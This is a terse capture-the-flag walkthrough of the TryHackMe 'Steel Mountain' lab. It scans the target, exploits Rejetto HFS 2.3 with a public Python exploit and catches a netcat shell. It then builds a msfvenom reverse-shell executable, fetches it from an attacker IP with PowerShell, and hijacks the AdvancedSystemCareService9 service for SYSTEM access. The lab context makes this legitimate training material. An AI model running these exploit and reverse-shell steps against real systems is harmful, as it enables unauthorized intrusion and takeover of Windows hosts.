THM - Steel Mountain
March 6, 2022•376 words
Steel Mountain
skibum 8/29/2020
Exploit
- Scan and save to an xml file for searchsploit
xml <port protocol="tcp" portid="80"> <state state="open" reason="syn-ack" reason_ttl="125"/> <service name="http" product="Microsoft IIS httpd" version="8.5" ostype="Windows" method="probed" conf="10"> <cpe>cpe:/a:microsoft:iis:8.5</cpe><cpe>cpe:/o:microsoft:windows</cpe> </service> <script id="http-methods" output="
 Potentially risky methods: TRACE"> <table key="Potentially risky methods"><elem>TRACE</elem></table> </script> <script id="http-server-header" output="Microsoft-IIS/8.5"> <elem>Microsoft-IIS/8.5</elem> </script> <script id="http-title" output="Site doesn't have a title (text/html)."></script> </port> <port protocol="tcp" portid="445"> <state state="open" reason="syn-ack" reason_ttl="125"/> <service name="microsoft-ds" product="Microsoft Windows Server 2008 R2 - 2012 microsoft-ds" ostype="Windows Server 2008 R2 - 2012" method="probed" conf="10"> <cpe>cpe:/o:microsoft:windows</cpe> </service> </port> <port protocol="tcp" portid="8080"> <state state="open" reason="syn-ack" reason_ttl="125"/> <service name="http" product="HttpFileServer httpd" version="2.3" ostype="Windows" method="probed" conf="10"> <cpe>cpe:/a:rejetto:httpfileserver:2.3</cpe> <cpe>cpe:/o:microsoft:windows</cpe> </service> <script id="http-server-header" output="HFS 2.3"> <elem>HFS 2.3</elem> </script> <script id="http-title" output="HFS /"> <elem key="title">HFS /</elem> </script> </port>
- Since rejetto stands out use searchsploit to list exploits for rejetto
searchsploit rejetto http 2.3
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
- Review and copy the python exploit 3.1. modify this file to have the proper ip and the port that will be used
- Copy (cp) the nc.exe file from SecList to the active pwd
- Start a python http server
python -m SimpleHTTPServer 80
- Create a netcat session
nc -nlvp 9001
- Run the Exploit
python 39161.py <$IP> 8080
7.1. Note that this will need to be ran 2+ times to open the nc session - Find the user.txt under c:\Users\bill\Desktop
- Copy winpeas and run to find a priv esc 9.1. Advanced System Care Service 9 is exploitable
- Create a reverse shell for the Advanced.exe file
msfvenom -p windows/shell_reverse_tcp LHOST=10.13.2.170 LPORT=9002 -f exe -o Advanced.exe
- Open a second netcat session
nc -nlvp 9002
- Download the file to the c:\Program Files (x86)\IObit using
powershell -c wget "http://10.11.1.198/Advanced.exe" -outfile Advanced.exe
- Run the exploit
13.1.
sc stop AdvancedSystemCareService9
13.2.sc start AdvancedSystemCareService9
- P0wn3d !!! now get the root flag at c:\Users\Administrator\Desktop